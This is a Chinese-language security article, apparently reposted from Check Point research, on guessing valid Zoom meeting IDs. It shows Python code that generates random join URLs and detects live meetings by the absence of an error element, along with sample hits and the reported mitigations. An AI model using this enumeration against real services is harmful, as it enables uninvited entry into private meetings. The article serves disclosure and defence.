Zoom安全漏洞分析

ang010ela 嘶吼专业版

本文分析一个ZOOM安全漏洞，以及如何利用该漏洞来识别和加入活动会议。文中的漏洞详情已经报告给了Zoom Video Communications公司，Zoom也给出了一些缓解措施。

问题分析

使用Zoom的用户可能知道Zoom Meeting ID是由于9或10或11个数字组成的。如果没有启用“Require meeting password”选项或Waiting Room，这个9/10/11位的数字就唯一可以确保会议安全防止非认证用户接入的。

首先，研究人员预生成了一个可能有效的Zoom Meeting ID列表。从中随机选取1000个Meeting ID，并准备用URL字符串加入会议：

urls = []

for _ in range(1000):

urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

但是如何确定一个Zoom Meeting ID表示的是有效的会议呢？研究人员发现了一个快速、简易的方式来检查，就是根据在访问“Join Meeting” URL (https://zoom.us/j/{MEETING_ID}) 返回的响应的HTML Body的div元素来进行检查：

< div id="join-errormsg" > < i > < /i > < span > Invalid meeting ID. < /span > < /div&gt

然后研究人员尝试将以上方法自动化：

for url in urls:

yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback)

…

def parseResponse(response):

if response.css('div#join-errormsg').get() is None:

print('Valid Meeting ID found: {}'.format(response.url))

else:

print('Invalid Meeting ID'

运行的结果如下所示：

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/22XXX41X8

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5

Invalid Meeting ID

Bingo!

结果

研究人员在随机生成的Meeting ID中预测了大约4%的Meeting ID，与暴力破解相比，成功率还是非常高的。

缓解措施

研究人员在2019年7月22日联系了Zoom，并提出了以下缓解措施：

1. 重新实现Meeting ID生成算法

2. 用强加密的随机化函数替换现有随机函数

3. 增加Meeting ID的数字或符号的数量

4. 强制主机使用口令、PIN、SSO等进行认证。

本文参考自：https://research.checkpoint.com/2020/zoom-zoom-we-are-watching-you/

更多相关文章